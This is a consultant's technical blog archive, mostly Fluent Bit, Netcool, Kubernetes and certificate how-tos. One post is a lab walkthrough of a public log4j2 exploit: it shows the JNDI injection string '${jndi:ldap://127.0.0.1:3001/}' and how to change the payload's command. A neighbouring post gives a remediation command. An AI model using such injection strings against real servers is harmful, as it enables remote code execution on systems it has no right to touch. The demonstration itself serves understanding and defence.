Tuesday, March 14, 2023
Installing the ELK stack and Fluent-Bit on Minikube on Ubuntu 20.04
Monday, March 13, 2023
Installing Minikube and Prometheus on Ubuntu 20.04 as of 3/11/2023
Background
Solution
Monday, February 13, 2023
Recent versions of the Netcool Message Bus Probe support Kafka
We are working with a client who needed to send events from their cloud-native application to their legacy on-prem Netcool Operations Insight implementation. After researching a bit, we found that their application was already writing the events of interest to a Kafka topic. The only issue was that they had an old version of the Message Bus Probe. So we installed version 21 of the probe and used the included Nokia NFMP files as a starting point to configure the probe to pull the events from this topic so that they could be processed by Netcool.
Reach out to us if you're using Netcool/Watson AIOps and need some help working through some obstacles.
Friday, February 10, 2023
The Fluent Bit rewrite_tag filter doesn't fully work until version 1.8.12
I'm working with a client who has a packaged Kubernetes distribution installed that includes Fluent Bit 1.8.3. I tried the config from my last blog post on their system, and it just does NOT work as expected. In their system, it creates a new message with the new tag, but then none of the subsequent filters are applied. I had been working in the latest version (2.0.9), and everything worked like a champ. So I downloaded 1.8.3 and found that the same configuration didn't work. It seemed to only partially apply the rewrite_tag filter (if I set KEEP to false, it would delete the message, but if I set KEEP to true, it did nothing). The test configuration they suggest, using an input of type Dummy, actually works exactly as expected. The problem seems to occur when you have an Input of type tail, and there is no workaround other than upgrading to a newer version. I downloaded and tested each release from 1.8.4 onward, and 1.8.12 was the first that worked correctly. So my client is now working on upgrading to a newer version.
Wednesday, February 8, 2023
Configuring Fluent Bit to send messages to the Netcool Message Bus probe
Background
Fluent Bit is an open source and multi-platform log processor tool which aims to be a generic Swiss knife for logs processing and distribution.
It is included with several distributions of Kubernetes, and is used to pull log messages from multiple sources, modify them as needed, and send the records to one or more output destinations. It is amazingly customizable, so you can do just about any processing you want, with a couple of idiosyncrasies, one of which I'll describe here.
The Challenge
What if you have a log message that you want to handle in two different ways:
1. Normalize the fields in the log message for storage in ElasticSearch (or Splunk, etc.).
2. Modify the log message so it has all of the appropriate fields needed for processing by your Netcool environment (fields that you don't necessarily want in your log storage system).
The Solution
Here's a high-level graphic showing what we're going to do:
Our rewrite_tag FILTER is going to match all tags beginning with "kub". This will exclude our new tag, which will be "INC". So after the rewrite_tag filter, there will be two messages in the pipeline: the original plus our new one with our custom "INC" tag. We can then specify the appropriate Match statements in later FILTERs to only match the appropriate tag. So in the ES output above, the Match_Regex statement is:
Match_Regex ^(?!INC).*
The official name of the above is a "negative lookahead". Go ahead and try it out at regex101.com if you want. It will match any tag that does NOT begin with "INC", which is the custom tag for our new messages that we want to send to our HTTP Message Bus probe.
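If you'd rather check the pattern from a script than in a browser, here is a minimal sketch in Python. It uses Python's re module as a stand-in for Fluent Bit's own regex engine, which should behave the same way for a pattern this simple, and the tag names are made up for illustration.

```python
import re

# Same pattern as the Match_Regex value: any tag that does NOT start with "INC".
NOT_INC = re.compile(r"^(?!INC).*")


def selected_by_es_output(tag: str) -> bool:
    """Return True if the tag is matched by ^(?!INC).* (hypothetical helper)."""
    return NOT_INC.match(tag) is not None


# Hypothetical tags, for illustration only.
for tag in ["kube.var.log.containers.app.log", "host.syslog", "INC", "INC.extra"]:
    print(f"{tag}: {selected_by_es_output(tag)}")
```

Note that the lookahead only checks the start of the tag, so a tag such as "kube.INC" would still be matched.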
The rewrite_tag FILTER will be custom for your environment, but the following may be close in many cases. For my case, I want to match any message that has a log field containing the string "Error writing to" (the match is case-sensitive). You'll have to analyze your current messages to find the appropriate field and string that you're interested in. But here's my rewrite_tag FILTER stanza:
[FILTER]
    Name         rewrite_tag
    Match_Regex  ^(?!INC).*
    Rule         $log ^.*Error\swriting\sto.* INC true
The "Rule" statement is the tricky part here. This statement consists of 5 parts, separated by whitespace:
Rule - the literal string "Rule"
$log - the name of the field you want to search to create a new message, preceded by "$". In this case, we want to search the field named log.
^.*Error\swriting\sto.* - the regular expression we want to match in the specified field. This regular expression CANNOT CONTAIN SPACES. That's why I'm using "\s".
INC - this is the name of the tag to set on the new message. This tag is ONLY used within the Fluent Bit pipeline, so it can literally be anything you want. I chose "INC" because these messages will be sent to the Message Bus probe to eventually create incidents in ServiceNow.
true - this specifies that we want to KEEP the original message. This allows it to continue to be processed as needed.
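To make the parts of the Rule line concrete, here is a rough Python model of it. This is only a sketch of the behavior described above, not Fluent Bit's actual implementation: the function names parse_rule and apply_rule are made up, and splitting the line on whitespace is my assumption about why the regular expression can't contain spaces.

```python
import re


def parse_rule(line: str):
    """Split a Rule line into (key, regex, new_tag, keep). Hypothetical helper."""
    parts = line.split()  # whitespace-separated, so a space inside the regex adds tokens
    if len(parts) != 5 or parts[0] != "Rule":
        raise ValueError(f"expected 'Rule KEY REGEX NEW_TAG KEEP', got {len(parts)} tokens")
    _, key, regex, new_tag, keep = parts
    return key.lstrip("$"), re.compile(regex), new_tag, keep.lower() == "true"


def apply_rule(record: dict, tag: str, rule_line: str):
    """Return the (tag, record) pairs left in the pipeline after the rule runs."""
    key, regex, new_tag, keep = parse_rule(rule_line)
    value = record.get(key)
    matched = isinstance(value, str) and regex.search(value) is not None
    out = []
    if matched:
        out.append((new_tag, record))  # the new message with the custom tag
    if keep or not matched:
        out.append((tag, record))      # the original message continues on
    return out


rule = r"Rule $log ^.*Error\swriting\sto.* INC true"
print(apply_rule({"log": "Error writing to /data/out"}, "kube.app", rule))
```

With KEEP set to true, a matching record shows up twice (once as "INC", once under its original tag), while a non-matching record passes through untouched.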
After you have the rewrite_tag FILTER in place, you will have at least one additional FILTER of type "modify" in your pipeline to allow you to add fields, rename fields, etc. You'll then have an OUTPUT stanza of type "http" to specify the location of the Message Bus probe. Something like the following:
[OUTPUT]
    Name              http
    Match             INC
    host              probehost
    port              80
    uri               /probe/webhook/fluentbit
    format            json
    json_date_format  epoch
The above specifies that the URL that these messages will be sent to is
http://probehost:80/probe/webhook/fluentbit
In the JSON that's sent in the body of the POST request, there will be a field named date, and it will be in Unix "epoch" format, which is an integer representing the number of seconds since the Unix epoch of January 1, 1970 UTC (a "normal" Unix/Linux timestamp).
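As a quick illustration of what the receiving side sees, here is a small Python sketch that reads the date field from a request body and converts it to a readable UTC time. The sample body is made up, and I'm assuming the records arrive as a JSON array; check an actual request from your own pipeline before relying on the exact shape.

```python
import json
from datetime import datetime, timezone


def record_times(body: str):
    """Return (UTC datetime, log text) for each record in a JSON array body."""
    results = []
    for record in json.loads(body):
        # "date" holds whole seconds since January 1, 1970 UTC.
        when = datetime.fromtimestamp(record["date"], tz=timezone.utc)
        results.append((when, record.get("log", "")))
    return results


# Hypothetical POST body, for illustration only.
sample_body = '[{"date": 1675868400, "log": "Error writing to /data/out"}]'
for when, log in record_times(sample_body):
    print(when.isoformat(), log)
```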
That's it. That's all of the basic configuration needed on the Fluent Bit side.
Extra Credit/TLS Config
Wednesday, November 30, 2022
How to download a specific version of the OpenShift installer and client
Go here: https://mirror.openshift.com/pub/openshift-v4/clients/ocp . Select the version you want and you're good to go!
Wednesday, August 24, 2022
An Example of a Useful Notification Email
You should have monitors in place to detect problems in your enterprise. These can be individual monitors defined for an agent, or queries/thresholds defined for data collected by an observability platform. Either way, at some point, you need to notify someone about what went wrong.
The following is an email notification we set up for a customer:
The important things to note are:
- What failed? The "Tivoli CTH Health Check" failed in PROD.
- What needs to be done? Run all of the checks that are listed at the end of the email.
Friday, May 6, 2022
The Cylance Smart Antivirus agent will ruin your day
I am currently helping a customer move their ITM 6 infrastructure from AIX to Red Hat 8, and the largest hurdle has been the Cylance agent. When doing any kind of enterprise install, my first step is to copy the install files to all of the servers (in this case it is 16 servers: 2 HUB TEMS, 12 RTEMS, 2 TEPS). In its default configuration, the Cylance agent will remove files that it determines are suspicious. In my case, that means that it deleted one or two tar files, and would re-delete them whenever I copied them over again. The Cylance log under /opt/cylance/desktop/log showed exactly what it was doing, so we were able to work with the Cylance team to correct this.
After the delete issue was resolved, we found that the Cylance agent was stopping some executables from running, with just a "Segmentation fault" error, and the error persisted even after we stopped the Cylance agent. This is because even when the agent isn't running, it still has hooks into kernel system calls that leverage a local cache. That took a while to resolve, but we finally got all of the appropriate directories whitelisted.
The last problem encountered was with the Cylance agent's Memory Protection feature. In this case, it caused 'tacmd tepslogin' to fail, dumping a bunch of text to the command line and writing no information to the normal ITM logs. Looking in the Cylance log file again, I could see that it was blocking some memory action performed by the ITM Java executable. That now seems to be resolved.
Hopefully this short post can help others identify these types of issues before throwing their server out the window.
Tuesday, January 25, 2022
Configuring certificates for the Netcool email probe when using Office365
Background
Solution
cd /tmp
for i in file{1..100}
do
    openssl s_client -showcerts -verify 5 -connect outlook.office365.com:995 < /dev/null > "$i"
    # each file contains at least two certificates. Each certificate needs to be in its own file
    # to import it into the keystore. That's what the following command does. It will create
    # files named file*-00, file*-01, file*-02 if there are two certificates returned by the above
    # command.
    csplit -f "$i-" "$i" '/-----BEGIN CERTIFICATE-----/' '{*}'
    # file*-00 doesn't contain anything useful (certs are in *-01 and *-02), so we will delete it
    rm file*-00
done
# now import all of the above certs into the keystore.
for i in file*-*
do
    keytool -keystore "/opt/IBM/tivoli/netcool/core/certs/key_netcool.jks" -import \
        -trustcacerts -alias "$i" -file "$i" -noprompt -storepass THE_KEYSTORE_PASS
done
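If csplit isn't available, the splitting step can also be sketched in Python. This is an alternative I'm suggesting rather than part of the original procedure: the helper name split_certs is made up, and unlike csplit it keeps only the PEM blocks themselves and discards the surrounding openssl output.

```python
import re

# One PEM certificate block, from its BEGIN line through its END line.
PEM_CERT = re.compile(
    r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----",
    re.DOTALL,
)


def split_certs(s_client_output: str):
    """Return each certificate found in `openssl s_client -showcerts` output."""
    return [m.group(0) + "\n" for m in PEM_CERT.finditer(s_client_output)]


# Placeholder text standing in for real openssl output (not real certificates).
sample = (
    "CONNECTED(00000003)\n"
    "-----BEGIN CERTIFICATE-----\nAAAA\n-----END CERTIFICATE-----\n"
    " 1 s:issuer line\n"
    "-----BEGIN CERTIFICATE-----\nBBBB\n-----END CERTIFICATE-----\n"
)
for index, cert in enumerate(split_certs(sample), start=1):
    print(f"certificate {index}: {len(cert)} characters")
```

Each returned string could then be written to its own file and imported with the same keytool command shown above.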
Friday, January 7, 2022
10 Things to Avoid Doing in MS Excel and Their Alternatives
Microsoft Excel is an amazingly powerful tool that has more capabilities than most people can imagine. Today I ran across this video that covers 10 different things to avoid doing in Excel to help make working with your data easier.
Tuesday, December 28, 2021
The best video I've ever seen for learning Regular Expressions
I've worked with regular expressions for a long time now, and I'm always working on getting better at them. I ran across this 20-minute YouTube video and was really blown away by how quickly it explains everything you need to know about regular expressions. I highly recommend it.
Many of his other videos are also worth your time.
One huge caveat aimed at those in the world of Enterprise Software:
Not all products support all features of the regular expressions described in the video, and there are often nuances to the exact functions that are supported. For example, the following features described in the video aren't supported by various versions of *some* components of Netcool and ServiceNow, depending on which regex engine they use:
- look-ahead and look-behind operations
- named groups
Because of cases like this, I always recommend that you try to accomplish your goal using the simplest regular expression features possible, and always test your regular expressions. Regexr.com is the site used in the video, and it is very powerful, but it appears to support the latest and greatest JavaScript regular expressions, with no way to change that. Regex101.com is the site I normally use, and it allows you to select one of several "flavors" of regular expressions.
Monday, December 20, 2021
The Zero-click exploit that Google researchers say is 'the most technically sophisticated exploit ever seen'
In contrast to the trivially exploitable Log4j2 vulnerability, here's a zero-click exploit from NSO Group. Here's an article describing it in understandable terms first:
https://www.engadget.com/google-researchers-nso-zero-click-iphone-imessage-exploit-143213776.html
And here are the technical details:
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Tuesday, December 14, 2021
Interesting article on the new frontier of botnets identifying C2 servers using "memo" data in blockchain transactions between known wallets
The title tells you the gist of the story, but here's the full article:
https://gizmodo.com/how-cybercriminals-are-using-bitcoins-blockchain-to-mak-1848189767
Basically, the botnet code is written such that if its current C2 (Command and Control) server is down, it will search the public blockchain for transactions between known wallets. Every transaction can have an optional "memo" field, which is where the botnet controllers put the address of other C2 servers.
Example and video of log4j2 exploit
This is a great example of the exploit in action:
https://github.com/ilsubyeega/log4j2-exploits
Here's the video showing it in action:
You can run it yourself. On Linux, you'll first have to install the following prereqs:
node
npm
gradle
default-jdk
And you'll also need to modify Main.java before compiling to change the line:
Runtime.getRuntime().exec("cmd.exe /c start echo Exploit");
to
Runtime.getRuntime().exec("gnome-terminal");
The pieces that are provided for the exploit are:
- An HTTP server that would be owned by the attacker in the wild. This hosts the Main.class file that is going to display a new window on the server when the exploit fires.
- An LDAP server that would be owned by the attacker in the wild. This is the server queried by the vulnerable JndiLookup.class file, which includes a link to the HTTP server.
- A JVM that represents an application server like WebSphere or Tomcat
Once you feed the JVM the user-controlled string "${jndi:ldap://127.0.0.1:3001/}", you'll see that the JVM spits out errors, but still successfully opens a new window. In the wild, this window represents ANY COMMAND THE ATTACKER WANTS TO RUN ON THE SERVER, and it's running as the same userid that's running the JVM.
Basically, if you didn't already know, this is the worst and most easily exploited vulnerability that's been found in the wild in a long time.
Monday, December 13, 2021
Quickest log4j2 vulnerability remediation I've found on Linux
Quickest Linux fix I've found for the #log4j2 vulnerability:
find / -name "log4j-core-*.jar" -exec zip -q -d {} org/apache/logging/log4j/core/lookup/JndiLookup.class \;
reboot
The above command will find all files named "log4j-core-*.jar" on the system and will remove the "JndiLookup.class" file from them. The 'reboot' is a fairly large hammer, but it will restart all processes on the box. Alternatively, you can stop and restart all java processes running on the server.
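To confirm the cleanup worked, or to see which jars are affected before changing anything, a read-only check can be sketched in Python. The function name jars_with_jndi_lookup is made up for this example. Like the find command, it only looks at files named "log4j-core-*.jar", so copies bundled inside other archives would not be found.

```python
import zipfile
from pathlib import Path

# The class removed by the zip -d command above.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def jars_with_jndi_lookup(root):
    """Return log4j-core jars under `root` that still contain JndiLookup.class."""
    hits = []
    for jar in Path(root).rglob("log4j-core-*.jar"):
        try:
            with zipfile.ZipFile(jar) as archive:
                if JNDI_CLASS in archive.namelist():
                    hits.append(jar)
        except (zipfile.BadZipFile, OSError):
            # Skip unreadable or corrupt files rather than aborting the scan.
            continue
    return sorted(hits)
```

For example, calling jars_with_jndi_lookup("/opt") returns the jars under /opt that still need attention. An empty list after running the find command suggests the class was removed from every jar the script could read.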
Tuesday, October 26, 2021
Converting timestamp in milliseconds to seconds in Netcool probe rules
Background
Conversion Process
Wednesday, September 22, 2021
Using VSCode to write Netcool Probe Rules and Impact Policies
VSCode is Microsoft's free, cross-platform IDE for software development. It has been booming in popularity recently because it is an amazing tool with lots of plugins. These plugins provide all kinds of different functionality. The ones I want to introduce to you today provide syntax highlighting and syntax validation for Impact Policy Language (IPL) and Netcool Probe Rules Language.
Here's an example from the Probe Rules extension:
Compared to the vi editor or Notepad++, this is a HUGE improvement.
Wednesday, May 5, 2021
ServiceNow Quebec Release Netcool Connector V2 Implemented in JavaScript
Background
Prior to the Quebec Release, the Netcool Connector was only available as a Groovy script. In the Quebec release, ServiceNow offers BOTH the legacy Groovy connector and a new JavaScript-based connector. This new connector is named IBM Netcool V2. This new connector leverages the OMNIbus REST API for retrieving and updating events, whereas the legacy Groovy script directly connects to the ObjectServer database to perform these operations.
Monday, March 22, 2021
vCenter Appliance "tiny" Size Is Not Enough for Creating OpenShift Cluster
I just tried to create an OpenShift 4.7 cluster using a vCenter appliance that was configured with the "tiny" size from the installer. This gives it 2 vcpus and 10GB RAM. I was using Installer Provided Infrastructure (IPI) on vSphere 6.7. The cluster creation failed with a timeout. I looked at the vCenter server performance stats and saw that it was using all of its CPU and memory. So I destroyed the cluster and doubled the resources on the vCenter VM. I then ran the cluster creation again, and everything completed as expected.
Wednesday, March 17, 2021
Overprovisioning vCPUs in ESXi as a VMware guest
Background
Solution
As you can see, my ESXi guest (32 vCPUs) has three guest VMs that are using a total of 42 vCPUs, and they're all running fine. If all of the vCPUs get busy, performance will degrade, but I don't expect that to ever happen in my lab.
Tuesday, March 16, 2021
Troubleshooting Red Hat CodeReady Containers
Background
Environment
Guest VM
crc VM log file
virsh command
virsh list --all
virt-manager
You can then click on the crc VM to see the console. There is no way to actually log into the crc VM because you can only log in via the core user's private key (shown later). Googling around, I see that password access has been requested/suggested, but there appears to be no plan to implement it at this time.
crc VM
crc pods log files
ssh -i ~/.crc/machines/crc/id_ecdsa core@api.crc.testing



